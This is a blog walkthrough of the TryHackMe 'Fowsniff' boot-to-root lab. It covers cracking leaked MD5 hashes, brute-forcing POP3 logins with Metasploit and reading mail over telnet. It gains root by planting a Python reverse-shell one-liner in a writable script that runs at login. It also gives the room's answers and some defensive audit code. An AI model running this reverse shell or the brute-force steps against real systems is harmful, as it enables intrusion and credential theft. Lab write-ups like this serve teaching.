TryHackMe: Fowsniff CTF

Jul 10, 2021


Difficulty: Easy

Hi all, this is TheF1ash, and this is my first Medium post, on a CTF room from TryHackMe: Fowsniff CTF.
This is a boot2root machine: we deploy it and try to gain access by exploiting its vulnerabilities. Our ultimate goal is to get access to the machine as the user with the maximum privileges, in short, as root on Linux. So, let's begin!

I have a TryHackMe subscription, so I get access to the in-browser AttackBox that TryHackMe provides. If we are using the AttackBox, we do not need to connect to the TryHackMe VPN; we can do all our hacking in the browser. I will be using that AttackBox as my attacking machine.

On deploying the machine in the room, I get the following IP address for the machine:


So let's try to find out what ports and services are open using nmap. The command I generally use for nmap is nmap -sV -vv <machine_ip>. This is not an extensive scan, but it is the one I use as a quick starting point. If I feel I haven't found enough, or want more information, I can come back and do another scan with some additional flags, but this should be enough to get us started.

So let's run that scan here: nmap -sV -vv and we see the following results:

Nmap scan results

As we can see, ports 80, 110 and 143 are the common ports that appear to be open. Port 80 is HTTP, 110 is POP3 and 143 is IMAP.

Let's take a look at the website at .

Fowsniff Corp website

The page says that the internal systems of Fowsniff suffered a data breach and that employee usernames and passwords might have been exposed. Attackers were also able to hijack the official @fowsniffcorp Twitter account, and sensitive information might be released via this account! Let's see if they already did :).

On checking @fowsniffcorp Twitter account, we see:

Fowsniff Corp Twitter account

It seems it has been pwned, as suspected. The attacker appears to have leaked the passwords, as can be seen in the pinned tweet. Let's open the Pastebin link to see the dump.

Going to we get the following password hashes dumped along with the email addresses:

Fowsniff Corporation Passwords LEAKED!
Here are their email passwords dumped from their databases. They left their pop3 server WIDE OPEN, too! MD5 is insecure, so you shouldn't have trouble cracking them but I was too lazy haha =P

Since all of those are MD5 password hashes, we can try to crack them. Before doing that, though, I just wanted to point out this last tweet by the hijacked FowSniffCorp account:

This indicates that the sysadmin has the following credentials:


Hash Cracking

Let's crack that hash using an online tool, CrackStation, at .

Hmm, it seems CrackStation could not crack that hash. Let's see whether we can upload the whole hash list and crack the other hashes:

CrackStation hash cracker

As we can see, CrackStation was able to crack all hashes except one, the one for the sysadmin.
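As an added example (not code from the room or this walkthrough), the check below does offline what CrackStation did for the dump: it parses constructed email:hash lines, matches the unsalted MD5 values against a short list of common passwords so an admin can see which accounts need a forced reset, and contrasts that with salted PBKDF2 storage, where one lookup table no longer covers every account. The dump, addresses and passwords are constructed, not the room's.

```python
import hashlib
import os

# Constructed sample in the email:md5 layout of the leaked paste. These are
# NOT the room's hashes: alice's and bob's are MD5s of two common passwords,
# carol's is a filler value that matches nothing.
LEAKED_DUMP = """\
Passwords LEAKED (constructed sample)
alice@example.test:5f4dcc3b5aa765d61d8327deb882cf99
bob@example.test:e10adc3949ba59abbe56e057f20f883e
carol@example.test:0123456789abcdef0123456789abcdef
"""
COMMON_PASSWORDS = ["password", "123456", "letmein"]
HEX = set("0123456789abcdef")

def parse_dump(text):
    """Return {email: md5_hex} from 'email:hash' lines; skip anything else."""
    creds = {}
    for line in text.splitlines():
        email, sep, digest = line.rpartition(":")
        digest = digest.strip().lower()
        if sep and len(digest) == 32 and set(digest) <= HEX:
            creds[email.strip()] = digest
    return creds

def md5_lookup_audit(creds, candidates):
    """Accounts whose unsalted MD5 equals the MD5 of a candidate password.
    One table of candidate hashes is compared against every account at once,
    which is exactly why a CrackStation-style lookup works on this dump."""
    table = {hashlib.md5(p.encode()).hexdigest(): p for p in candidates}
    return {email: table[h] for email, h in creds.items() if h in table}

def store_password(password, salt=None):
    """How a mail store should keep passwords: per-user random salt plus a
    slow KDF (PBKDF2-HMAC-SHA256). Returns (salt, derived_key)."""
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)

def verify_password(password, salt, derived_key):
    """Recompute with the stored salt; equal passwords now differ per user."""
    return store_password(password, salt)[1] == derived_key
```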

Now let's see if we can brute force the POP3 login using Metasploit, as asked in one of the questions in the room.
On opening msfconsole and running search pop3, the first result is auxiliary/scanner/pop3/pop3_login. It seems we can brute force email logins using this module.
Let's use this module to brute force the login. First, select the module with use auxiliary/scanner/pop3/pop3_login. (Tip: we can also use the module number from the search results, 0 here, like use 0, to select the corresponding module directly.)

Once we have selected the module, we can show the options we need to set using show options.

Metasploit POP3 show options

As we can see, I have already set the options. It is required to set BRUTEFORCE_SPEED, RHOSTS (the machine we are attacking), RPORT (the POP3 port), STOP_ON_SUCCESS, THREADS and VERBOSE. I set USERPASS_FILE to a file containing the usernames and passwords we cracked in pairs, one pair per line, separated by a space. (Note: I had to remove the @fowsniff part from the usernames to get a SUCCESS.) Also, you can point USER_FILE and PASS_FILE to any empty files you want; otherwise the module uses its default files, which took longer in my case.
Once we have the options set, all we need to do is run the module using run.
It will brute force our username and password combinations.

POP3 Username and Password brute force results

As we can see, Metasploit ran our username and password combinations against the POP3 server. It came back with one success: seina:scoobydoo2 worked.

Question: What was seina’s password to the email service?
Answer: scoobydoo2.

Let’s try to connect to the email service using Seina’s credentials.

To do this, I did a quick search on DuckDuckGo and found this site:
So we can do a telnet 110 to connect to the email server using telnet.
After that, we can issue the USER seina command followed by PASS scoobydoo2, and we can see we are logged in.
Now we can do LIST to see the message list, which shows a summary of the mailbox with each message's number and its size in bytes.

We can do a RETR 1 to retrieve the first message. On doing that, we see it is from stone@fowsniff and it seems it was sent to all other employees.

From the message we get the temporary SSH password:


Question: Looking through her emails, what was a temporary password set for her?
Answer: S1ck3nBluff+secureshell

Similarly, we can retrieve the second email message, but in that one we don't see anything much of use.
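The USER/PASS/LIST/RETR exchange above, as an added example that is not code from the room or this walkthrough: a small in-memory model of both sides of the POP3 conversation, including the dot-stuffing rule for multi-line replies that a client has to undo. The mailbox, the password hunter2 and the messages are constructed; the model also makes visible that PASS is sent verbatim, which is why an unencrypted port 110 belongs on a findings list.

```python
# Constructed mailbox: user, password and both messages are invented; the
# second message has a body line starting with "." to exercise stuffing.
MAILBOX = {"seina": ("hunter2", [
    "From: stone@example.test\r\n\r\nYour temporary password is in this mail.",
    "From: baksteen@example.test\r\n\r\n.sig line that begins with a dot",
])}

class Pop3Server:
    """RFC 1939 states: USER/PASS in AUTHORIZATION, then TRANSACTION. PASS
    arrives verbatim, so on plain port 110 the password is readable in transit."""
    def __init__(self, users):
        self.users, self.user, self.authed = users, None, False

    def handle(self, line):
        cmd, _, arg = line.strip().partition(" ")
        cmd = cmd.upper()
        if not self.authed:
            if cmd == "USER" and arg in self.users:
                self.user = arg
                return "+OK"
            if cmd == "PASS" and self.user and arg == self.users[self.user][0]:
                self.authed = True
                return "+OK Logged in."
            return "-ERR Authentication failed."
        msgs = self.users[self.user][1]
        if cmd == "LIST":  # one "number size" line per message, then a lone "."
            listing = "".join(f"{i} {len(m)}\r\n" for i, m in enumerate(msgs, 1))
            return f"+OK {len(msgs)} messages\r\n{listing}."
        if cmd == "RETR" and arg.isdigit() and 1 <= int(arg) <= len(msgs):
            m = msgs[int(arg) - 1]
            # Byte-stuffing: any body line starting with "." gets a second "."
            body = "\r\n".join("." + l if l.startswith(".") else l for l in m.split("\r\n"))
            return f"+OK {len(m)} octets\r\n{body}\r\n."
        return "-ERR Unknown command."

def parse_multiline(reply):
    """Client side: check the status line, drop the terminating '.', unstuff."""
    status, _, rest = reply.partition("\r\n")
    if not status.startswith("+OK"):
        raise ValueError(status)
    lines = rest.split("\r\n")
    if lines[-1] != ".":
        raise ValueError("unterminated multi-line response")
    return [l[1:] if l.startswith(".") else l for l in lines[:-1]]

def fetch_message(server, user, password, n):
    # The same USER, PASS, RETR n sequence the walkthrough types into telnet.
    for line in (f"USER {user}", f"PASS {password}"):
        if not server.handle(line).startswith("+OK"):
            return None
    return "\r\n".join(parse_multiline(server.handle(f"RETR {n}")))
```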

Now let's try to log in over SSH with stone's account and that password, as pointed out in the next question:

ssh stone@

It seems that this password doesn't work for stone or seina. Let's see if it works for baksteen, as the second email was sent by them.

And it worked! We are logged in to the system as baksteen.

Privilege Escalation

Let's see which groups the user is part of. We can do that using the groups command. We can see that baksteen is a member of the users and baksteen groups. Let's see if there are any interesting files that can be executed by members of those groups.

We see an interesting file, /opt/cube/ . On checking the permissions, we see it is owned by the users group, and we can write to it. This file is run by root whenever the Message of the Day script at /etc/update-motd.d/00-header runs (that is, whenever someone logs in over SSH), so let's put reverse shell code inside the file. We can use the Python reverse shell provided by TryHackMe:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((<IP>,1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

We replace <IP> with our attacking machine's IP (in quotes) and 1234 with whatever port we want to receive the reverse shell connection on.

Now we can set up a netcat listener on our attacking machine, on the same port we put in the payload, to receive the reverse shell connection: nc -lvnp 4444

Once we have everything ready, we connect to the machine over SSH again as baksteen.

And right after we log in to the machine, we get a reverse shell connection back as root on the netcat listener!

Root access
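The defender's side of the weakness above, as an added example not taken from the room or TryHackMe: an audit that walks the MOTD scripts root executes at every login, follows the absolute paths they invoke, and reports any file that someone other than the trusted owner and group could change. The demo directory tree, the banner.sh and banner.txt names and the file contents are constructed; on a real host you would point audit_motd at /etc/update-motd.d with the default trusted ids (root).

```python
import os, re, stat, tempfile

# Paths inside the scripts are matched by a crude absolute-path regex.
PATH_RE = re.compile(r"(?<![\w/])(/[\w./-]+)")

def referenced_paths(script):
    """Existing files named by absolute path inside a script."""
    with open(script, errors="replace") as f:
        return [p for p in PATH_RE.findall(f.read()) if os.path.isfile(p)]

def audit_motd(motd_dir, trusted_uid=0, trusted_gid=0):
    """Return {path: [reasons]} for MOTD scripts, and the files they invoke,
    that anyone but the trusted owner/group could change (root runs them all)."""
    findings = {}
    for name in sorted(os.listdir(motd_dir)):
        script = os.path.join(motd_dir, name)
        if not os.path.isfile(script):
            continue
        for path in [script] + referenced_paths(script):
            st = os.lstat(path)
            reasons = []
            if st.st_mode & stat.S_IWGRP:
                reasons.append("group-writable")
            if st.st_mode & stat.S_IWOTH:
                reasons.append("world-writable")
            if st.st_uid != trusted_uid:
                reasons.append(f"owned by uid {st.st_uid}")
            if st.st_gid != trusted_gid:
                reasons.append(f"group gid {st.st_gid}")
            if reasons:
                findings[path] = reasons
    return findings

def demo():
    """Constructed replica of the flaw: 00-header runs a group-writable
    script under opt/cube. Returns (findings, hook_path, safe_path)."""
    root = tempfile.mkdtemp()
    motd, cube = os.path.join(root, "update-motd.d"), os.path.join(root, "opt", "cube")
    os.makedirs(motd); os.makedirs(cube)
    hook, safe = os.path.join(cube, "banner.sh"), os.path.join(cube, "banner.txt")
    for path, body, mode in ((hook, "#!/bin/sh\necho banner\n", 0o775),  # 0775: the flaw
                             (safe, "Fowsniff banner\n", 0o644),
                             (os.path.join(motd, "00-header"),
                              f"sh {hook}\ncat {safe}\n", 0o755)):
        with open(path, "w") as f:
            f.write(body)
        os.chmod(path, mode)
    owner = os.lstat(safe)  # the demo's own files define the trusted owner/group
    return audit_motd(motd, owner.st_uid, owner.st_gid), hook, safe
```

Fixing the finding means the same checks pass: the hook becomes root-owned with mode 0755 (or moves out of a group-writable path), so nothing in the login chain is writable by an ordinary user.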

And that completes the walkthrough! I enjoyed the room and will post more walkthroughs for TryHackMe rooms in the future.



